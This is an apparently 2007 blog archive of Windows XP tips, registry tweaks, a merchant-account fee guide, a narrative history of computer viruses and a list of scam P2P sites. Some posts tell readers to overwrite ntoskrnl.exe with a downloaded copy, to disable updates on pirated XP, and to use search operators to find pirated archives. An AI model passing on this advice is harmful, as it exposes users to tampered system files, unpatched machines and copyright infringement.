Saturday, September 1, 2007

Hide in the (Network) Neighborhood

Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.

Change Windows XP Boot Screen

This is a very simple trick to do if you have done the same for the logon screen and the start button. There are 2 ways to do this trick that I know about one is doing it manually and the other is using a program called bootxp. I am going to tell you the manual way to do it, but if you want to know the other way just let me know, so I can do an update to the guide. Now once you have downloaded your ntoskrnl.exe file save it a general location so that you will have easy access to it, like my folder.

Once you have ntoskrnl.exe file in an easy access folder, restart your pc into safe mode. Once into safe mode go to the folder where your files are located.

Now that you are there copy the file that you want to change your boot screen too. Once you have copied that file, hit the window key + r or type %windir%\system32 in the run command, so that folder as follows.

Once there paste your new file into the folder and overwrite the existing folder.

Now that you have your new file in the folder restart your pc as you normally would and your new boot screen should appear. You can download this bootscreen here.


Image and ntoskrnl.exe files provided by

u can go to



A simple tool to find music on the net

Exploseek is a nice simple tool to find music on the net. It is possible to use the major search engines to type your queries, but if you use this tool it will be much easier as some of you have probably seen already. We always try to improve the queries, if possible, and will update it at random times. Further you don't need to install a peer-to-peer program with possible spyware and other security issues, the price to pay is that you will not always find as much as such a program, but on a lucky day you find a load of music.


Getting older programs to run on Windows XP

Most programs run properly on Windows XP. The exceptions are some older games and other programs that were written specifically for an earlier version of Windows. To run your program on Windows XP, you can try the following, Run the Program Compatibility Wizard. As an alternative, you can set the compatibility properties manually. Update your program, drivers, or hardware. These options are covered in detail below.

The Program Compatibility Wizard:
This wizard prompts you to test your program in different modes (environments) and with various settings. For example, if the program was originally designed to run on Windows 95, set the compatibility mode to Windows 95 and try running your program again. If successful, the program will start in that mode each time. The wizard also allows you to try different settings, such as switching the display to 256 colors and the screen resolution to 640 x 480 pixels. If compatibility problems prevent you from installing a program on Windows XP, run the Program Compatibility Wizard on the setup file for the program. The file may be called Setup.exe or something similar, and is probably located on the Installation disc for the program. To run the Program Compatibility Wizard click Start, click Help and Support, click Find compatible hardware and software for Windows XP, and then, under See Also in the navigation pane, click "Program Compatibility Wizard."

Set the compatibility properties manually:
As an alternative to running the Program Compatibility Wizard, you can set the compatibility properties for a program manually. The settings are the same as the options in the Program Compatibility Wizard. To set the compatibility properties for a program manually Right-click the program icon on your desktop or the shortcut on the Start menu for the program you want to run, and then click Properties. Click the Compatibility tab, and change the compatibility settings for your program.

The Compatibility tab is only available for programs installed on your hard drive. Although you can run the Program Compatibility Wizard on programs or setup files on a CD-ROM or floppy disk, your changes will not remain in effect after you close the program. For more information about an option on the Compatibility tab, right-click the option and then click "What's This."

Update your program or drivers:
If your program does not run correctly after testing it with the Program Compatibility Wizard, check the Web for updates or other fixes, as follows:

Check the Web site of the program's manufacturer to see if an update or patch is available.
Check Windows Update to see if a fix is available for the program.
Click Home on the menu bar of Help and Support Center, then click Windows Update in the right pane.

If the program is a game that uses DirectX, ensure that you are using the latest version of DirectX. In addition, check the Web site of the manufacturer of your video card or sound card to see if newer drivers are available for either of them.

Friday, August 31, 2007

Disable Picture And Fax Viewer

We all know that WinXP likes to keep itself held together, and how it doesn't like you uninstalling certain components. Well The Picture and Fax Viewer, is one of these programs which can cause problems if removed incorrectly. It can be disabled safely as follows:

[Start] [Run] type regedit and click [OK]

Navigate to :

HKEY_CLASSES_ROOT/ SystemFileAssociations/ image/ ShellEx/ ContextMenuHandlers

then delete the Folder ShellImagePreview under ContextMenuHandlers

Note: If you want to restore the Picture and Fax Viewer :

Create the ShellImagePreview folder and create the String Value (Default)
Assign it the value {e84fda7c-1d6a-45f6-b725-cb260c236066}

NOTE: This tweak doesn't uninstall the program. It removes the association and therefore it cannot be run.

WISE WORDS:Be sure you are right, then go ahead.

Defending WinXP Pro -with what win-xp has to offer

Today I will tell you about various ways to Securing WinXP Pro with what win-xp has to offer by default. No extra third party software to tweak things which might make your system unstable and push it into the verge of reinstalling soon often.

Note: These are just notes of the changes i made to win-xp pro using win-xp options
after my default install. These changes will not secure your box 100% but they
make a good couple of 1st steps. They are in no specific order other than the
order that I performed them.

1. NTFS Partition.
2. Disable Error Reporting
3. Disable Automatic Updates (only if your XP copy is pirated)
4. Disable "Recent Documents" Viewed
5. Setup XP Firewall
6. Setup screensaver password
7. Setup BIOS password
8. Setup "AfterBios" login password
9. Account Modifications
-Rename Admin Account
-Disable Guest Account
-Disable Help_Assistant Account
-Disable Support Account
10. Install a virus scanner.
11. Change Login Screen (default shows user names)
12. Disable Remote Registry (and other services)
13. Disable/Change Auto-Search settings in IE.

1. NTFS Partition (I like being God over system users)

Be sure to install XP onto an NTFS partition so that you (the administrator) can take advantage
of file permissions. You want this option so that "you" can decide who reads, writes,
executes what files.

If you didn't install XP onto an NTFS partition. Convert It. To convert to NTFS follow
the instructions below.

Open a command prompt and type "convert c: /FT:NTFS /v"

This command will convert your c: partition from FAT to NTFS in verbose mode.

2. Disable Error Reporting - we don't want microsft to know every time we fuck up.
especially if we didn't pay for winxp.

control panel >> performance and maintenance >> system >> advanced >> error reporting
(disable all)

right click "my computer" >> manage >> services and applications >> services >> " stop
and disable" Error Reporting.

3. Disable automatic updates - to update, they must know what we have. thats a NO NO!

NOTE: DO THIS ONLY IF YOUR COPY OF XP IS PIRATED!! I suggest "auto update" if your copy
of XP is legal. If your copy is pirated then i suggest that you stay updated with
the latest fixes and patches manually.

control panel >> performance and maintenance >> system >> automatic updates
(disable updates)

right click "my computer" >> manage >> services and applications >> services >> " stop
and disable" Automatic Updates.

4. Quit listing most recent documents opened under the start button - Don't want the
girlfriend or the parents to find that interesting things you being viewing lately.

control panel >> appearance and themes >> task bar and start menu >> start menu >>
customize >> advanced

remove the check mark next to "List my most recently opened documents".

5. Block incoming traffic to your winxp box. - Before this change, i scanned my xp box and
found it to have many ports wide open. After this change, I found nothing and xp logged
the attempts in c:\windows\pfirewall.log.

control panel >> network connections >> right click "local area connection" >> properties
>> advanced >> check the box under "Internet Connection Firewall" then choose "settings".

Services Tab - leave all unchecked unless there is a service you are running that people
must be able to access.

Logging Options - Log everything.

ICMP - I left all these unchecked for the time being. (allowing nothing)

(this does not protect you from "Spy Ware". This only stops traffic from coming into
your win-xp box (not all traffic). It does not stop traffic from going out.) If you
need to stop traffic from going out and need a more secure firewall then download a real
firewall like "zone alarm or black ice".

6. Setting a screensaver password in case you leave some of your sensitive documents open when you walk away.
right click on the desktop >> properties >> screen saver >> check the box next to " On
Resume, Password Protect."

If you don't have a password set on your user account, you can do so in control panel >>
user accounts >> change account.

7. Setting a BIOS password - We don't want anyone rebooting the computer or trying to sneak
into your system while we are away at school or work.

I can't explain to one how this is done due to the differences between all computers and
how the BIOS settings are entered. If you know what I am talking about then do it. If you
don't know what I am talking about then learn how to do it. A screensaver password is useless
unless you setup a BIOS password.

8. Setting up the "AfterBios" password. Sometimes bios passwords are easily cracked. This
password will add extra local login security in case your bios pass is cracked. I don't
know bout you but i love having to type in 3 passwards and a username to login to my box.

Start >> run >> type "syskey" >> choose "update" >> choose "Password Startup" >> enter a
password and choose ok.

9. Renaming and Disabling Accounts for adminstrator, guest, help_assistant and support.
Right click my_computer >> manage >> local users and groups

rename administrator account
disable guest account
disable help_assistant account
disable support account

10. Install Virus Protection............. (We like our uncorrupted data and trojan free system)

Install a virus scanner. Your firewall might protect your system from unwanted hackers but
what about an unwanted virus or trojan?. I recommend installing a virus scanner such as
"Nortons" or "McAfee".

11. Change Default Login Screen............ (why do we want to share usernames with anyone?)

Xp uses the "welcome screen" by default. This screen has the names of all accounts on the
system so that the user only has to click on their name and type a password. Come on now....
We aren't that damn lazy. If we change this screen to the normal login, then prying eyes
will have to know a username and password to get in. Follow the instruction below to change

control panel >> user accounts >> change the way users log on or off

uncheck the box next to "Use Welcome Screen" and choose "apply options".

12. Disable Remote Registry..........(why would I need to edit my registry remotely anyway?)

right click "my computer" >> manage >> services and applications >> services >> " stop
and disable" Remote Registry.

NOTE: disable any services running in this area that you aren't using.

13. Disable/Change Auto-search in Internet Explorer. This is not really a security risk but it
is important to some people that prefer to keep their internet surfing to themselves and
away from microsoft.

Open Internet Explorer >> Click the "search" button >> click the "customize" button >> click
"autosearch settings" >> FOLLOW INSTRUCTIONS BELOW...........

DISABLE: In the "When Searching" drop down menu, select "Do not search from the address bar".
>> click "ok" >> "ok". Type an invalid address in your address bar and see if it
takes you to the msn search page or if it gives a "page not found" error. In this
case, the "page not found" error is what we want.

CHANGE: If you wish not to disable, but you wish to change it to your favorite ""
search page. Instead of following the "DISABLE" instructions, follow the instructions
below. Choose "Google Sites (or whatever you prefer)" from the "choose a search provider
to search from address bar" drop down menu >> click "ok" >> "ok"

I,myself personally believe that there is much more to securing your box than this. Maybe i will come up with more information soon. Don't miss them...

Useful information on Internet Merchant Account

Choosing An Internet Merchant Account:

Surf to Google and perform a search on "Internet Merchant Account". The results are staggering (2,300,000 results!) If you have created a web based business and need to accept credit card payments, your choices are limitless. Before you partner with a provider, take time to understand the different components of Internet credit card processing, and know what to look for in a merchant provider.

How It Works:

Accepting credit card payments through your web site actually requires multiple components. Between a paying customer and your bank account, three layers exist:

Payment Gateway - This is the code that will transmit a customer's order to and from an Internet merchant account provider. The payment gateway provides you the ability to accept customer billing information (credit card number, credit card type, expiration date, and payment amount) and the necessary validation steps that must be followed before the credit card is actually billed.

Internet Merchant Account - A Merchant Account is an account with a financial institution or bank, which enables you to accept credit card payments from your clients. The payment gateway actually transmits the billing information to the Internet merchant account provider. Unfortunately, most local banks do not provide Internet merchant account capability.

The main reason why most local financial institutions or banks do not want to provide online merchant accounts is because transactions conducted over the Internet are totally different from face to face transactions where a signature is required to authorize the purchase. This makes online transactions prone to credit card fraud. Fraud protection should be one of your primary considerations when choosing an Internet merchant account provider.

Web Site - Regardless of which merchant provider and gateway service you choose, your web site will need to integrate with your service providers. Most providers include detailed web integration instructions.

How Much Does It Cost ?

Understanding the total costs of your merchant provider can be tricky. Remember my Google example - there are more merchant account providers than there are people looking for internet merchant accounts so ask questions and be picky! Typically, an internet merchant account will have three types of costs:

- Up Front Application Fees
- On Going Fixed Fee
- Discount Rate
- Fixed Transaction Fee
- Termination Fees
- Miscellaneous Fees

Let us discuss each type of cost:

* Up Front Application Fees

Many Internet merchant accounts will require an up front application fee. This fee, supposedly, is to cover their costs for processing your application. In case you choose not to open an Internet merchant account, they still cover their initial costs. Although common, many providers waive these fees and I recommend that you choose a provider that does not require an up front fee.

* On Going Fixed Fee

Most all Internet merchant providers require a monthly fixed fee or "statement fee" as it is commonly named, which is simply another way to cover their costs and make money. You will be hard pressed to find a provider that does not require this type of fee on a monthly basis. However, do not choose an Internet merchant account that requires more than $10 per month. Additionally, most Internet merchant providers require a monthly minimum (usually $25). The bottom line is that you will be paying at least $25 per month (on top of the monthly statement fee) for your account.

* Discount Rate

Usually, the discount rate will be between 2 and 4 percent. The discount rate is the sales commission the provider earns on each sale. For example, if the discount rate offered is 3%, and you receive a sale over your web site for $20, you will owe 60 cents to your Internet merchant provider.

* Fixed Transaction Fee

Usually between $0.20 and $0.30, the fixed transaction fee is the fixed fee portion of each sale. Unlike the discount rate, the fixed transaction fee is the same for every transaction. Whether you get a $1 sale or a $100 sale, the transaction fee will be the same.

* Termination Fee

A bit more hidden in the small print, a termination fee can apply if you cancel your merchant account within a specified period of time (usually within one year). But beware, some merchant providers require a three year commitment!

* Miscellaneous Fees

If a customer requests a refund and they want their credit card credited, an Internet merchant provider will charge you a separate fee (usually between $10 - $20). Read the contract carefully, as other special fees may apply.

Putting It All Together

Now that the different fees have been explained, let us look at an example set of transactions to help understand what an Internet merchant account may cost your business on a monthly basis.

I have created a simple formula to help you calculate your monthly charges:

Total Charges = Statement Fee + Number of Transactions x (Average Sale x Discount Rate + Fixed Transaction Fee) + (Number of Charge backs x Charge back Fee)

For example, let us see you sell widgets over the Internet. The sales price for each widget is $10. You typically have 100 sales per month and about 5 people request refunds (charge backs). For this example, let us assume you have signed up with Jones&Jones Internet merchant account services and have the following terms:

Discount Rate - %2.5
Statement Fee - $10
Fixed Transaction Fee - $0.30
Charge back Fee - $15

Using my formula above, your monthly Jones&Jones charges will be:

Total Charges = 10 + 100 x (10 x .025 + 0.3) + (5 x 15) = $140

You can calculate your monthly sales revenue by multiplying your sales volume by your price:

Monthly Sales Revenue = 100 x $10 = $1000

Your Internet merchant provider is costing you 14% of your total sales.

Making Your Decision

Before you choose and Internet merchant provider, understand all of the cost components. Use your current or projected sales data to forecast what your Internet merchant account costs will be. Planning ahead can save you time and money.

I hope this insight will provide a good use for those who want to do business on the web.

WISE WORDS:A man's best friends are his ten fingers.

Change Default Location For Installing Apps

As the size of hard drives increase, more people are using partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base directory into which new programs are installed if your . However, you can change the default installation drive and/ or directory by using a Registry hack.

Run the Registry Editor (regedit) and go to


Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Thursday, August 30, 2007

Search Google For Rapidshare Links

If you wanna find some applications, files etc on via google, do the following.

Paste this into the google search box (not the address bar):

site: -filetype: zip OR rar daterange: 2453402-2453412

* this searches the site for any file that has extension .rar or .zip, and
has been indexed between 1-11 February.

try this one:-

dvd site: -filetype: zip OR rar daterange: 2453402-2453412

* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any application posted with the word dvd in it will be found.

There are mainly three criteria to keep in mind when doing this search.

1. site: your site of choice to search

2. filetype: filetypes you want to search,if you put a "OR" after the first
filetype you can add more.

3. daterange: (start date-end date)

* this uses the "Julian calendar", converter can be found here:

Disable Compression On Xp, NTFS partition, Disk Cleanup

On an NTFS partition, Disk Cleanup can compress old files to save space. But calculating the savings and performing the compression often take a long time, and on some systems, Disk Cleanup hangs during the process. If that happens, or if you don't care to wait, use this Registry tweak to disable the compression: Delete the key
HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\VolumeCaches\Compress Old Files.

WISE WORDS:The fear of Lord is the beginning of wisdom.

Evolution Of Computer Viruses History Of Viruses

part 1:

Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

Going back to the origin of viruses, it was in 1949 that Mathematician John Von Neumann described self-replicating programs which could resemble computer viruses as they are known today. However, it was not until the 60s that we find the predecessor of current viruses. In that decade, a group of programmers developed a game called Core Wars, which could reproduce every time it was run, and even saturate the memory of other players’ computers. The creators of this peculiar game also created the first antivirus, an application named Reeper, which could destroy copies created by Core Wars.

However, it was only in 1983 that one of these programmers announced the existence of Core Wars, which was described the following year in a prestigious scientific magazine: this was actually the starting point of what we call computer viruses today.

At that time, a still young MS-DOS was starting to become the preeminent operating system worldwide. This was a system with great prospects, but still many deficiencies as well, which arose from software developments and the lack of many hardware elements known today. Even like this, this new operating system became the target of a virus in 1986: Brain, a malicious code created in Pakistan which infected boot sectors of disks so that their contents could not be accessed. That year also saw the birth of the first Trojan: an application called PC-Write.

Shortly after, virus writers realized that infecting files could be even more harmful to systems. In 1987, a virus called Suriv-02 appeared, which infected COM files and opened the door to the infamous viruses Jerusalem or Viernes 13. However, the worst was still to come: 1988 set the date when the “Morris worm” appeared, infecting 6,000 computers.

From that date up to 1995 the types of malicious codes that are known today started being developed: the first macro viruses appeared, polymorphic viruses … Some of these even triggered epidemics, such as MichaelAngelo. However, there was an event that changed the virus scenario worldwide: the massive use of the Internet and e-mail. Little by little, viruses started adapting to this new situation until the appearance, in 1999, of Melissa, the first malicious code to cause a worldwide epidemic, opening a new era for computer viruses.

part 2:

This second installment of ‘The evolution of viruses’ will look at how malicious code used to spread before use of the Internet and e-mail became as commonplace as it is today, and the main objectives of the creators of those earlier viruses.
Until the worldwide web and e-mail were adopted as a standard means of communication the world over, the main mediums through which viruses spread were floppy disks, removable drives, CDs, etc., containing files that were already infected or with the virus code in an executable boot sector.

When a virus entered a system it could go memory resident, infecting other files as they were opened, or it could start to reproduce immediately, also infecting other files on the system. The virus code could also be triggered by a certain event, for example when the system clock reached a certain date or time. In this case, the virus creator would calculate the time necessary for the virus to spread and then set a date –often with some particular significance- for the virus to activate. In this way, the virus would have an incubation period during which it didn’t visibly affect computers, but just spread from one system to another waiting for ‘D-day’ to launch its payload. This incubation period would be vital to the virus successfully infecting as many computers as possible.

One classic example of a destructive virus that lay low before releasing its payload was CIH, also known as Chernobyl. The most damaging version of this malicious code activated on April 26, when it would try to overwrite the flash-BIOS, the memory which includes the code needed to control PC devices. This virus, which first appeared in June 1998, had a serious impact for over two years and still continues to infect computers today.

Because of the way in which they propagate, these viruses spread very slowly, especially in comparison to the speed of today’s malicious code. Towards the end of the Eighties, for example, the Friday 13th (or Jerusalem) virus needed a long time to actually spread and continued to infect computers for some years. In contrast, experts reckon that in January 2003, SQLSlammer took just ten minutes to cause global communication problems across the Internet.

Notoriety versus stealth

For the most part, in the past, the activation of a malicious code triggered a series of on screen messages or images, or caused sounds to be emitted to catch the user’s attention. Such was the case with the Ping Pong virus, which displayed a ball bouncing from one side of the screen to another. This kind of elaborate display was used by the creator of the virus to gain as much notoriety as possible. Nowadays however, the opposite is the norm, with virus authors trying to make malicious code as discreet as possible, infecting users’ systems without them noticing that anything is amiss.

part 3:

This third installment of ‘The evolution of viruses’ will look at how the Internet and e-mail changed the propagation techniques used by computer viruses.

Internet and e-mail revolutionized communications. However, as expected, virus creators didn’t take long to realize that along with this new means of communication, an excellent way of spreading their creations far and wide had also dawned. Therefore, they quickly changed their aim from infecting a few computers while drawing as much attention to themselves as possible, to damaging as many computers as possible, as quickly as possible. This change in strategy resulted in the first global virus epidemic, which was caused by the Melissa worm.

With the appearance of Melissa, the economic impact of a virus started to become an issue. As a result, users -above all companies- started to become seriously concerned about the consequences of viruses on the security of their computers. This is how users discovered antivirus programs, which started to be installed widely. However, this also brought about a new challenge for virus writers, how to slip past this protection and how to persuade users to run infected files.

The answer to which of these virus strategies was the most effective came in the form of a new worm: Love Letter, which used a simple but effective ruse that could be considered an early type of social engineering. This strategy involves inserting false messages that trick users into thinking that the message includes anything, except a virus. This worm’s bait was simple; it led users to believe that they had received a love letter.

This technique is still the most widely used. However, it is closely followed by another tactic that has been the center of attention lately: exploiting vulnerabilities in commonly used software. This strategy offers a range of possibilities depending on the security hole exploited. The first malicious code to use this method –and quite successfully- were the BubbleBoy and Kakworm worms. These worms exploited a vulnerability in Internet Explorer by inserting HTML code in the body of the e-mail message, which allowed them to run automatically, without needing the user to do a thing.

Vulnerabilities allow many different types of actions to be carried out. For example, they allow viruses to be dropped on computers directly from the Internet -such as the Blaster worm-. In fact, the effects of the virus depend on the vulnerability that the virus author tries to exploit.

part 4:

In the early days of computers, there were relatively few PCs likely to contain “sensitive” information, such as credit card numbers or other financial data, and these were generally limited to large companies that had already incorporated computers into working processes.

In any event, information stored in computers was not likely to be compromised, unless the computer was connected to a network through which the information could be transmitted. Of course, there were exceptions to this and there were cases in which hackers perpetrated frauds using data stored in IT systems. However, this was achieved through typical hacking activities, with no viruses involved.

The advent of the Internet however caused virus creators to change their objectives, and, from that moment on, they tried to infect as many computers as possible in the shortest time. Also, the introduction of Internet services -like e-banking or online shopping- brought in another change. Some virus creators started writing malicious codes not to infect computers, but, to steal confidential data associated to those services. Evidently, to achieve this, they needed viruses that could infect many computers silently.

Their malicious labor was finally rewarded with the appearance, in 1986, of a new breed of malicious code generically called “Trojan Horse”, or simply “Trojan”. This first Trojan was called PC-Write and tried to pass itself off as the shareware version of a text processor. When run, the Trojan displayed a functional text processor on screen. The problem was that, while the user wrote, PC-Write deleted and corrupted files on the computers’ hard disk.

After PC-Write, this type of malicious code evolved very quickly to reach the stage of present-day Trojans. Today, many of the people who design Trojans to steal data cannot be considered virus writers but simply thieves who, instead of using blowtorches or dynamite have turned to viruses to commit their crimes. Ldpinch.W or the Bancos or Tolger families of Trojans are examples of this

part 5:

Even though none of them can be left aside, some particular fields of computer science have played a more determinant role than others with regard to the evolution of viruses. One of the most influential fields has been the development of programming languages.

These languages are basically a means of communication with computers in order to tell them what to do. Even though each of them has its own specific development and formulation rules, computers in fact understand only one language called "machine code".

Programming languages act as an interpreter between the programmer and the computer. Obviously, the more directly you can communicate with the computer, the better it will understand you, and more complex actions you can ask it to perform.

According to this, programming languages can be divided into "low and high level" languages, depending on whether their syntax is more understandable for programmers or for computers. A "high level" language uses expressions that are easily understandable for most programmers, but not so much for computers. Visual Basic and C are good examples of this type of language.

On the contrary, expressions used by "low level" languages are closer to machine code, but are very difficult to understand for someone who has not been involved in the programming process. One of the most powerful, most widely used examples of this type of language is "assembler".

In order to explain the use of programming languages through virus history, it is necessary to refer to hardware evolution. It is not difficult to understand that an old 8-bit processor does not have the power of modern 64-bit processors, and this of course, has had an impact on the programming languages used.

In this and the next installments of this series, we will look at the different programming languages used by virus creators through computer history:

- Virus antecessors: Core Wars

As was already explained in the first chapter of this series, a group of programs called Core Wars, developed by engineers at an important telecommunications company, are considered the antecessors of current-day viruses. Computer science was still in the early stages and programming languages had hardly developed. For this reason, authors of these proto-viruses used a language that was almost equal to machine code to program them.

Curiously enough, it seems that one of the Core Wars programmers was Robert Thomas Morris, whose son programmed -years later- the "Morris worm". This malicious code became extraordinarily famous since it managed to infect 6,000 computers, an impressive figure for 1988.

- The new gurus of the 8-bits and the assembler language.

The names Altair, IMSAI and Apple in USA and Sinclair, Atari and Commodore in Europe, bring memories of times gone by, when a new generation of computer enthusiasts "fought" to establish their place in the programming world. To be the best, programmers needed to have profound knowledge of machine code and assembler, as interpreters of high-level languages used too much run time. BASIC, for example, was a relatively easy to learn language which allowed users to develop programs simply and quickly. It had however, many limitations.

This caused the appearance of two groups of programmers: those who used assembler and those who turned to high-level languages (BASIC and PASCAL, mainly).

Computer aficionados of the time enjoyed themselves more by programming useful software than malware. However, 1981 saw the birth of what can be considered the first 8-bit virus. Its name was "Elk Cloner", and was programmed in machine code. This virus could infect Apple II systems and displayed a message when it infected a computer.

part 6:

Computer viruses evolve in much the same way as in other areas of IT. Two of the most important factors in understanding how viruses have reached their current level are the development of programming languages and the appearance of increasingly powerful hardware.

In 1981, almost at the same time as Elk Kloner (the first virus for 8-bit processors) made its appearance, a new operating system was growing in popularity. Its full name was Microsoft Disk Operating System, although computer buffs throughout the world would soon refer to it simply as DOS.

DOS viruses

The development of MS DOS systems occurred in parallel to the appearance of new, more powerful hardware. Personal computers were gradually establishing themselves as tools that people could use in their everyday lives, and the result was that the number of PCs users grew substantially. Perhaps inevitably, more users also started creating viruses. Gradually, we witnessed the appearance of the first viruses and Trojans for DOS, written in assembler language and demonstrating a degree of skill on the part of their authors.

Far less programmers know assembler language than are familiar with high-level languages that are far easier to learn. Malicious code written in Fortran, Basic, Cobol, C or Pascal soon began to appear. The last two languages, which are well established and very powerful, are the most widely used, particularly in their TurboC and Turbo Pascal versions. This ultimately led to the appearance of “virus families”: that is, viruses that are followed by a vast number of related viruses which are slightly modified forms of the original code.

Other users took the less ‘artistic’ approach of creating destructive viruses that did not require any great knowledge of programming. As a result, batch processing file viruses or BAT viruses began to appear.

Win16 viruses

The development of 16-bit processors led to a new era in computing. The first consequence was the birth of Windows, which, at the time, was just an application to make it easier to handle DOS using a graphic interface.

The structure of Windows 3.xx files is rather difficult to understand, and the assembler language code is very complicated, as a result of which few programmers initially attempted to develop viruses for this platform. But this problem was soon solved thanks to the development of programming tools for high-level languages, above all Visual Basic. This application is so effective that many virus creators adopted it as their ‘daily working tool’. This meant that writing a virus had become a very straightforward task, and viruses soon appeared in their hundreds. This development was accompanied by the appearance of the first Trojans able to steal passwords. As a result, more than 500 variants of the AOL Trojan family -designed to steal personal information from infected computers- were identified.

part 7:

This seventh edition on the history of computer viruses will look at how the development of Windows and Visual Basic has influenced the evolution of viruses, as with the development of these, worldwide epidemics also evolved such as the first one caused by Melissa in 1999.

While Windows changed from being an application designed to make DOS easier to manage to a 32-bit platform and operating system in its own right, virus creators went back to using assembler as the main language for programming viruses.

Versions 5 and 6 of Visual Basic (VB) were developed, making it the preferred tool, along with Borland Delphi (the Pascal development for the Windows environment), for Trojan and worm writers. Then, Visual C, a powerful environment developed in C for Windows, was adopted for creating viruses, Trojans and worms. This last type of malware gained unusual strength, taking over almost all other types of viruses. Even though the characteristics of worms have changed over time, they all have the same objective: to spread to as many computers as possible, as quickly as possible.

With time, Visual Basic became extremely popular and Microsoft implemented part of the functionality of this language as an interpreter capable of running script files with a similar syntax.

At the same time as the Win32 platform was implemented, the first script viruses also appeared: malware inside a simple text file. These demonstrated that not only executable files (.EXE and .COM files) could carry viruses. As already seen with BAT viruses, there are also other means of propagation, proving the saying "anything that can be executed directly or through a interpreter can contain malware." To be specific, the first viruses that infected the macros included in Microsoft Office emerged. As a result, Word, Excel, Access and PowerPoint become ways of spreading ‘lethal weapons’, which destroyed information when the user simply opened a document.

Melissa and self-executing worms

The powerful script interpreters in Microsoft Office allowed virus authors to arm their creations with the characteristics of worms. A clear example is Melissa, a Word macro virus with the characteristics of a worm that infects Word 97 and 2000 documents. This worm automatically sends itself out as an attachment to an e-mail message to the first 50 contacts in the Outlook address book on the affected computer. This technique, which has unfortunately become very popular nowadays, was first used in this virus which, in 1999, caused one of the largest epidemics in computer history in just a few days. In fact, companies like Microsoft, Intel or Lucent Technologies had to block their connections to the Internet due to the actions of Melissa.

The technique started by Melissa was developed in 1999 by viruses like VBS/Freelink, which unlike its predecessor sent itself out to all the contacts in the address book on the infected PC. This started a new wave of worms capable of sending themselves out to all the contacts in the Outlook address book on the infected computer. Of these, the worm that most stands out from the rest is VBS/LoveLetter, more commonly known as ‘I love You’, which emerged in May 2000 and caused an epidemic that caused damage estimated at 10,000 million euros. In order to get the user’s attention and help it to spread, this worm sent itself out in an e-mail message with the subject ‘ILOVEYOU’ and an attached file called ‘LOVE-LETTER-FOR-YOU.TXT.VBS’. When the user opened this attachment, the computer was infected.

As well as Melissa, in 1999 another type of virus emerged that also marked a milestone in virus history. In November of that year, VBS/BubbleBoy appeared, a new type of Internet worm written in VB Script. VBS/BubbleBoy was automatically run without the user needing to click on an attached file, as it exploited a vulnerability in Internet Explorer 5 to automatically run when the message was opened or viewed. This worm was followed in 2000 by JS/Kak.Worm, which spread by hiding behind Java Script in the auto-signature in Microsoft Outlook Express, allowing it to infect computers without the user needing to run an attached file. These were the first samples of a series of worms, which were joined later on by worms capable of attacking computers when the user is browsing the Internet.

WISE WORDS:The secret of success is constancy in purpose.

List Of Sites I Recommend Not To Go To ~UPDATED~

Misspellings or misrepresentation Tactics
















hxxp:// - Beware, links on the page prompt for download of star dialer.

hxxp:// - Same as Again, beware of star dialer.

hxxp:// - Same as and

hxxp:// - Fishy executable present here.



hxxp:// - Redirects to


hxxp:// - I discovered this site while reading Sharmans copyright infringment complaint to









hxxp:// - Old soulseek domain, that now links to a mainpeen dialer (scumware).


hxxp:// - WinMX based scam.



Regular P2P scam type sites







hxxp:// - Looks to me to be just a cheap plug for an product (an MP3 CD player).

hxxp:// - Not only do they link to yet another scam site, they also link to many forms of adware and spyware including
gator and aluriaaffiliates.




















hxxp:// - Links to an existing scam site.







hxxp:// - This one was being displayed on BeatKing through the Google ads


hxxp:// - Claims it's legal; obviously a scam.

hxxp:// - The main culprit is (





hxxp:// - Another claim of legality.


























Tuesday, August 28, 2007

How To Set search For All Files In Winxp

When you perform a search for a file in Windows XP. The default setting is for XP to ONLY return files in the "Search Results" pane - when they are registered file types to a program on your PC.

In other words if you are looking for a file that is NOT registered with an application on your PC, it will not be found using the default search settings.

However, you can turn off the default by a quick Tweak of the registry!

Open the Registry editor (type regedit from the Run command) and navigate to:

HKEY LOCAL MACHINE\ SYSTEM\ CurrentControlSet\ Control\

Double-Click the value named:


..and change the value from 0 to 1

Exit the registry editor and reboot!!!!!

Slow Opening Of File Dialogs

An intermittent slowdown opening file dialogs or Windows Explorer listings is often caused by a mapped network drive. You can select Map Network Drive from Windows Explorer's Tools menu to make a drive or a folder on a remote PC appear as a simple drive letter on your computer. This will let you access that drive or folder as if it were a local drive. After a restart, Windows reestablishes the connection when it's needed—for example, when you open the drop-down box that displays a tree containing My Computer and all drives below it. This initial connection can sometimes be slow the first time in a session. If the remote PC is not accessible, each attempt to display the folder tree may be slowed. Most likely the reason that some of your file-open dialogs are slow and some aren't lies in their initial display mode.

If the inconvenience of this slowdown outweighs the convenience of having a mapped network drive, simply click on Tools in Windows Explorer's menu and select Disconnect Network Drive. Select the drive to disconnect and click on OK.

WISE WORDS:Coming events cast their shadows before.

Securing your WIN XP computer

Do you work in a corporate environment where you don't appreciate your co-workers or boss having access to your comp and private files when you are not around?

You can provide added level of security to your WIN XP System. This is called securing your Win XP accounts database. You can store all information related to your accounts in a encrypted form on a floppy disk. What this would do is that if You do not have access to your floppy disk, You can not access the system. I am not sure You realized what I just said ! Even if You know your user id/password, You will not be able to access the system unless and until You have this startup disk.

The process of generating this secure startup floppy disk is simple. Go to START-RUN and type syskey. You will see a window come up. Click on Upgrade command button. You would see another window popping up which will give You the option of storing the encrypted accounts database either locally or on your floppy disk. Choose floppy disk and click OK and let the process complete. You are done.

Next time You reboot the computer and get to the login prompt, make sure that You have the floppy disk available in A: drive else You can not log in.

WISE WORDS:Better to be harmless, than harmful.

Search Google For Ebook Server

As you know is the most popular search engine in the world.

Here are some tips to helps you find eBooks with Google:

Find Apache's (default) Index page

Try this query:

